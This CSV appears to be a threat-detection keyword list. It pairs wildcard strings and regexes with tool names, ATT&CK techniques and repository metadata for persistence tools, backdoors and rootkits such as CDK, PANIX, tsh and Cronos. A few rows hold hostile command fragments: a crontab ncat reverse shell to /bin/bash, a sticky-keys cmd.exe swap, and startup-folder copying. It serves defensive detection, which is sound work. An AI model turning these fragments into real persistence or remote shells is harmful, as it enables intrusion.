"*ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852*",".{0,1000}ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514*",".{0,1000}cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1*",".{0,1000}cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*CDK auto exploit via K8s backdoor daemonset*",".{0,1000}CDK\sauto\sexploit\svia\sK8s\sbackdoor\sdaemonset.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#content","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cdk run mount-cgroup *shell-cmd-payloads*",".{0,1000}cdk\srun\smount\-cgroup\s.{0,1000}shell\-cmd\-payloads.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cdk-fabric run service-probe 127.0.0.1*",".{0,1000}cdk\-fabric\srun\sservice\-probe\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cdk-team/CDK*",".{0,1000}cdk\-team\/CDK.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cf25b9f3-849e-447f-a029-2fef5969eca3*",".{0,1000}cf25b9f3\-849e\-447f\-a029\-2fef5969eca3.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4*",".{0,1000}cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cfalta/PoshADCS*",".{0,1000}cfalta\/PoshADCS.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*chmod +x /usr/lib/systemd/system-generators/makecon*",".{0,1000}chmod\s\+x\s\/usr\/lib\/systemd\/system\-generators\/makecon.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*chmod +x evil.php*",".{0,1000}chmod\s\+x\sevil\.php.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*cmd /c regsvr32.exe /s C:\*\desktop.ini"" start= auto*",".{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\sC\:\\.{0,1000}\\desktop\.ini\""\sstart\=\sauto.{0,1000}","greyware_tool_keyword","regsvr32","suspicious service creation executing a desktop.ini file observed in a malware sample","T1543.003","TA0003","N/A","N/A","Persistence","https://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*cmd/tsh.go*",".{0,1000}cmd\/tsh\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*cmd/tshd.go*",".{0,1000}cmd\/tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*ColeHouston/Sunder*",".{0,1000}ColeHouston\/Sunder.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","1","N/A","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*COM Object hijacking persistence.ps1*",".{0,1000}COM\sObject\shijacking\spersistence\.ps1.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","N/A","8","1","57","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z"
"*COM-Hunter_v*.zip*",".{0,1000}COM\-Hunter_v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*COM-Hunter-main*",".{0,1000}COM\-Hunter\-main.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*Con7ext Shell V.2*",".{0,1000}Con7ext\sShell\sV\.2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Convert-ADCSFlag *",".{0,1000}Convert\-ADCSFlag\s.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*Convert-ADCSPrivateKeyFlag*",".{0,1000}Convert\-ADCSPrivateKeyFlag.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*copy-item *\roaming\microsoft\windows\start menu\programs\startup*",".{0,1000}copy\-item\s.{0,1000}\\roaming\\microsoft\\windows\\start\smenu\\programs\\startup.{0,1000}","greyware_tool_keyword","powershell","Copy file to startup via Powershell","T1050 - T1106 - T1547.009","TA0003 - TA0005 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*cp ""/media/windows/Windows/System32/cmd.exe"" ""/media/windows/Windows/System32/*",".{0,1000}cp\s\""\/media\/windows\/Windows\/System32\/cmd\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*creaktive/tsh*",".{0,1000}creaktive\/tsh.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","1","#linux","N/A","10","6","551","127","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*CreateStringPayload(""RULER"")*",".{0,1000}CreateStringPayload\(\""RULER\""\).{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*Cronos Rootkit.*",".{0,1000}Cronos\sRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*CronosDebugger.*",".{0,1000}CronosDebugger\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*CronosRootkit.*",".{0,1000}CronosRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*crontab* sleep *ncat * -e /bin/bash*crontab*",".{0,1000}crontab.{0,1000}\ssleep\s.{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}crontab.{0,1000}","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*CUPLIS BYPASSS SHELL*",".{0,1000}CUPLIS\sBYPASSS\sSHELL.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*cwB0AGEAcgB0ACAAYwBhAGwAYwA=*",".{0,1000}cwB0AGEAcgB0ACAAYwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*cybersectroll/SharpPersistSD*",".{0,1000}cybersectroll\/SharpPersistSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*CykuTW/tsh-go*",".{0,1000}CykuTW\/tsh\-go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*D Y N A S T Y  - P E R S I S T*",".{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3*",".{0,1000}d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022*",".{0,1000}d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e*",".{0,1000}d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2*",".{0,1000}d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2*",".{0,1000}d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f*",".{0,1000}d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64*",".{0,1000}d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5*",".{0,1000}d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb*",".{0,1000}d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602*",".{0,1000}d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*D3m0n1z3dShell-main*",".{0,1000}D3m0n1z3dShell\-main.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c*",".{0,1000}d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556*",".{0,1000}d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061*",".{0,1000}d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d*",".{0,1000}d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd*",".{0,1000}d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4*",".{0,1000}d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b*",".{0,1000}d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198*",".{0,1000}d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed*",".{0,1000}d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25*",".{0,1000}d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d*",".{0,1000}d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15*",".{0,1000}d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
